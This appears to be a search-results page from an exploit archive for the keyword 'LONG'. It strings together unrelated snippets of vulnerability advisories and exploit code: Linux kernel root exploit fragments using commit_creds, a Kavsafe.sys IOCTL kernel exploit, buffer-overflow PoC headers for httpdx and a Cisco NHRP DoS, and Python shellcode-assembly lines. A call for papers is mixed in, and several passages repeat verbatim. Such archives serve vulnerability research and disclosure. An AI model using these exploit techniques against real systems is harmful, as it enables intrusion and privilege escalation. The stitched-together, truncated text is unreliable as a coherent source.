Next Page >>
LONG
/******************************************************************************/
/* */
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */
/* */
/* Feel free to modify this code as you like, as long as you include the */
/* above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* Cisco bug ID: CSCin95836 */
Let's look in code:
"./src/modules/proxy/proxy_util.c"
long int ap_proxy_send_fb(BUFF *f, request_rec *r, cache_req *c, off_t len, int nowrite, int chunked, size_t recv_buffer_size)
{
...
size_t buf_size;
long remaining = 0;
iPrint Client, which can be exploited by malicious people to
compromise a user's system.
1) A boundary error in the Novell iPrint ActiveX control (ienipp.ocx)
when handling the "GetDriverFile()" method can be exploited to cause a
stack-based buffer overflow by passing an overly long string as the
third argument.
2) Two boundary errors in the Novell iPrint ActiveX control
(ienipp.ocx) when constructing a URI based on input to the
"GetPrinterURLList()" and "GetPrinterURLList2()" methods can be
use this payload
# put retFix in our attack string
attackString = fixRet
print "\t[*] added fixRet function; attackString is " +
str(len(attackString)) + " bytes long"
# append enough NOPs to hit either the beginning of the payload or the
location of ret
if len(payload) <= afterRetSize + 4: # payload will not occupy any space
before ret
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int getroot(void)
POC:
#include <windows.h>
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
BREG_DELETE_KEY BRegDeleteKey = NULL;
...
...
while(1) {
/* added f:m:o: byMin */
opt = getopt_long(argc, argv,
"vhrxtglpo:i:c:s:b:Q:na:f:m:46", long_options, NULL);
if(opt == -1)
break;
switch(opt) {
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
EXPLOIT CODE:
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
httpdx web server 1.4 is vulnerable to a remote buffer overflow using long GET requests such as http://www.example.com/aaa=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
The vulnerability lies in httpdx_src/http.cpp in h_handlepeer() : strcpy(index,client->filereq);
Other versions may also be vulnerable.
Exploit (0day) (Tested with httpdx 1.4 on WinXP SP3)
#include <stdio.h>
#include <stdlib.h>
Node Manager, which can be exploited by malicious people to compromise
a vulnerable system.
1) Various boundary errors in the OpenView5.exe CGI application when
processing parameters can be exploited to cause stack-based buffer
overflows via HTTP requests to the CGI application with overly long
parameter strings.
2) A boundary error in ov.dll can be exploited to cause a stack-based
buffer overflow by e.g. sending a HTTP request to the OpenView5.exe
CGI application with an overly long parameter string.
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
EXPLOIT CODE:
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
> FILE *f;
> unsigned long addr;
> char dummy;
> char sname[512];
Description of Vulnerability:
-------------------------------------------------------------------------------------
Vpopmail and QmailAdmin are prone to several Integer Overflows due that
numeric types of more range are needed to store user's quota nowadays.
Using an integer is not enough because gets overflowed when the user
has more than 2 Gigabytes in his/her mailbox, furthermore a long
integer is neither the solution because a long integer has the same
range than an integer in 32-bits machines.
$salt = wp_generate_password();
update_option('secret', $salt);
}
}
// $salt is a seven char long password. $secret_key is null.
return apply_filters('salt', $secret_key . $salt);
}
The wp_salt()'s value is stored here:
[in] VARIANT URL,
[in] VARIANT hostName,
[in] VARIANT localFile,
[in] VARIANT remoteFile,
[in] VARIANT fdxCookie,
[in] long isSecure,
[in] long isUpload,
[in] int portNo,
[in] long isAscii,
[in] long shouldPerformMD5,
[in] long isCheckpointRestart,
0000000013rxrLogin~~administrator
The single argument ("administrator") is copied into a buffer size of
0x1AC on the stack using wsprintfW, however no string length checks are
performed. By sending an overly long username as part of the first
authentication request, an exploitable condition is reached.
Vulnerability 2: Authentication Password Overflow
Another stack-based buffer overflow exists within the authentication
Application: Soldat
http://www.soldat.pl
Versions: game <= 1.4.2 and dedicated server <= 2.6.2
Platforms: Windows (Linux not affected)
Bugs: A] clients crash caused by too long strings on the screen
B] denial of service through file transfer port
C] easy IP banning
Exploitation: remote
A] versus clients
B] versus server (Windows only)
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
Papers reporting original and unpublished research results on above and
any other related topics are solicited. Submission should include a
cover page with authors' names, affiliations, addresses, fax and phone
numbers, and email addresses. Include up to 6 keywords from the above
list and an abstract of no more than 300 words. Authors can submit
their contribution as a short or long contribution:
Short paper: it should present ongoing work of the researchers in order
to communicate and share their current ideas with the community. It
could also present new extended results of a previously published
paper. Short papers should not exceed 4 pages in length in
classes, under the 'Schema' menu. The class name is intended to have a
maximum length of 32 characters. This limitation is enforced on the
client side by setting a 'maxlength' property with a value of 32 in
the proper form field, but no verification is performed on the server
side to ensure that the user-defined class name is, at most, 32
characters long. By tampering the POST request that sends the class
name when creating a new class, an authenticated user can define an
overly long class name that will cause a stack-based buffer overflow
on the iManager web server, making it possible for the attacker to
overwrite return addresses and Structured Exception Handlers, allowing
the execution of arbitrary code with the privileges of the current
Manager, which can be exploited by malicious people to compromise a
user's system.
1) A boundary error in the parsing of file names inside torrent files
can be exploited to cause a heap-based buffer overflow via an overly
long file name.
2) Two boundary errors when parsing names from torrent files can be
exploited to cause stack-based buffer overflows via overly long file
names.
D-Link DIR-100 long url filter evasion
scip AG Vulnerability ID 3808 (09/08/2008)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808
I. INTRODUCTION
D-Link DIR-100 is a small and cost-effective router and firewall device
for small offices and home users. More details are available at the
official product web site (German link):
Remarkably, we can access this interface anonymously via
"ncacn_ip_tcp". The following is the IDL of the function of opnum
0x10A:
/* opcode: 0x156, address: 0x28EB1C00 */
long sub_28EB1C00 (
[in] handle_t arg_1,
[in][string] char * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
user's system.
1) A boundary error in the EML reader (emlsr.dll) when parsing certain
headers ("To:", "Cc:", "Bcc:", "From:", "Date:", "Subject:",
"Priority:", "Importance:", and "X-MSMail-Priority:") in EML files can
be exploited to cause a heap-based buffer overflow via an overly long
string.
2) A boundary error in the EML reader (emlsr.dll) when encountering the
beginning of RFC2047 encoded-words in headers can be exploited to cause
a heap-based buffer overflow via an overly long string.
user's system.
1) A boundary error in the EML reader (emlsr.dll) when parsing certain
headers ("To:", "Cc:", "Bcc:", "From:", "Date:", "Subject:",
"Priority:", "Importance:", and "X-MSMail-Priority:") in EML files can
be exploited to cause a heap-based buffer overflow via an overly long
string.
2) A boundary error in the EML reader (emlsr.dll) when encountering the
beginning of RFC2047 encoded-words in headers can be exploited to cause
a heap-based buffer overflow via an overly long string.
interface is identified by 506b1890-14c8-11d1-bbc3-00805fa6962e v1.0.
Opnum 0x10d specifies the vulnerable operation within this interface.
Function 0x10d's IDL as follows:
long sub_28EA5F70 (
[in] handle_t arg_1,
[in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
Dreambox DM500 webserver long URL request denial of service
scip AG Vulnerability ID 3807 (08/29/2008)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3807
I. INTRODUCTION
Dreambox is a Linux-based DVB satellite, terrestrial and cable digital
television decoder (set-top box), produced by German multimedia vendor
Dream Multimedia.
Next Page>>
|
